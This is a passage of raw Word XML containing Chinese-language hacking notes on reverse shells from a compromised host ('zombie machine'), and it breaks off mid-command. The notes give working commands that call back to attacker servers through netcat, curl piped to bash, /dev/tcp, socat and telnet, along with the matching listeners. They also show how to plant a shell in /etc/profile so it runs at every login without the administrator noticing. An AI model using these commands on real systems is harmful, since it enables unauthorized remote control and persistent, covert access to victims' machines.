      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>号端口发送</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1718C2" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="00A10237"/>
    <w:p w14:paraId="0D5C0379" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="00A10237" w:rsidRDefault="000202D6" w:rsidP="00A10237"/>
    <w:p w14:paraId="2B94676D" w14:textId="58AC0C59" w:rsidR="003B68A5" w:rsidRDefault="00A10237" w:rsidP="00A10237">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法三</w:t>
      </w:r>
      <w:r w:rsidR="00127C0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1FDFA" w14:textId="77777777" w:rsidR="00A10237" w:rsidRDefault="00A10237" w:rsidP="00A10237"/>
    <w:p w14:paraId="6F62D916" w14:textId="14FEA265" w:rsidR="00A10237" w:rsidRDefault="00A10237" w:rsidP="00A10237">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果肉鸡有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EFB5D" w14:textId="2E4D8C9C" w:rsidR="00A10237" w:rsidRPr="00A10237" w:rsidRDefault="00A10237" w:rsidP="00A10237">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netcat ip port -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7741640C" w14:textId="77777777" w:rsidR="000C733D" w:rsidRDefault="000C733D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F887B91" w14:textId="75724FAC" w:rsidR="00127C0B" w:rsidRDefault="00127C0B" w:rsidP="00127C0B">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法四：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50268421" w14:textId="6D199C4E" w:rsidR="00127C0B" w:rsidRDefault="00127C0B" w:rsidP="00127C0B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者服务器创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E741AD6" w14:textId="77777777" w:rsidR="00127C0B" w:rsidRDefault="00127C0B" w:rsidP="00127C0B">
      <w:r w:rsidRPr="00B6293E">
        <w:t>/bin/bash -i &gt;&amp; /dev/tcp/192.227.167.113/6001 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11337AE2" w14:textId="77777777" w:rsidR="00127C0B" w:rsidRDefault="00127C0B" w:rsidP="00127C0B"/>
    <w:p w14:paraId="5BE4AC79" w14:textId="56EE91EB" w:rsidR="00127C0B" w:rsidRDefault="00127C0B" w:rsidP="00127C0B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>肉鸡执行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1069FE99" w14:textId="77777777" w:rsidR="00127C0B" w:rsidRPr="00127C0B" w:rsidRDefault="00127C0B" w:rsidP="00127C0B">
      <w:r w:rsidRPr="00127C0B">
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r w:rsidRPr="00127C0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r w:rsidRPr="00127C0B">
        <w:t>.xxx.xxx.72</w:t>
      </w:r>
      <w:r w:rsidRPr="00127C0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00127C0B">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F6ED4" w14:textId="77777777" w:rsidR="00127C0B" w:rsidRPr="00127C0B" w:rsidRDefault="00127C0B" w:rsidP="00127C0B"/>
    <w:p w14:paraId="3620C85A" w14:textId="7568348D" w:rsidR="00127C0B" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法五：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/profile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>窗口执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F3B0EE" w14:textId="77777777" w:rsidR="00DB501A" w:rsidRDefault="00DB501A" w:rsidP="000202D6"/>
    <w:p w14:paraId="10B7FF8F" w14:textId="44CA9DF1" w:rsidR="00CB71DC" w:rsidRDefault="00CB71DC" w:rsidP="000202D6">
      <w:r w:rsidRPr="00CB71DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只要是登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>本地登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>远程登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t>是通过非登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t>（例如直接通过运行命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t xml:space="preserve"> sh </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t xml:space="preserve"> bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t>），那么它不会执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t xml:space="preserve"> /etc/profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t>，而是可能执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t xml:space="preserve"> /etc/bashrc </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t>或其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB71DC">
        <w:t>特定的配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0B780C" w14:textId="77777777" w:rsidR="00643F30" w:rsidRDefault="00643F30" w:rsidP="000202D6"/>
    <w:p w14:paraId="6FF73DE1" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">/bin/bash </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> /dev/tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/47.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.72/2333</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0DE116" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>最后面那个</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>为的是防止管理员无法输入命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B540EE8" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="691E200E" w14:textId="713D639B" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>方法六：</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C09E2A" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>下一个多功能的网络工具，名字来由是</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>”Socket CAT”</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>，因此可以看出它是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>的，其功能与</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>类似，不过据说可以看做</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>的加强版，事实上的确也是如此。我这里只简单的介绍下怎么使用它开启监听和反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>，其他详细内容可以参见这里：</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="000202D6">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://brieflyx.me/2015/linux-tools/socat-introduction/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F808C5F" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>的方法很简单：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195ED8F" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>等可以直接使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t> apt-get install socat </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>命令进行安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC740A5" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>也可以去官网下载源码包：</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="000202D6">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://www.dest-unreach.org/socat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A07CE89" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击机开启本地监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B3A61" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>socat TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>LISTEN</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:2333</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B8890" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC2B063" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">lvvp </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5A906" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>目标机主动连接攻击机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262039A" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>socat tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:47.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.72:2333</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> exec:'bash -li'</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>pty</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>stderr</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>setsid</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>sigint</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>sane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C88A96" w14:textId="77777777" w:rsidR="000C733D" w:rsidRPr="000202D6" w:rsidRDefault="000C733D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63392257" w14:textId="26066318" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>方法七：</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E75DBE" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>不可用，且目标主机和攻击机上支持</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>服务时，我们可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403F859" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>方法一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B3C41" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击机开启本地监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32238638" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">lvvp </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E0EECF" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>目标机主动连接攻击机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B363439" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000202D6">
        <w:t>mknod a p</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> telnet </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>47.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.72</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:rPr>
          <w:b/>
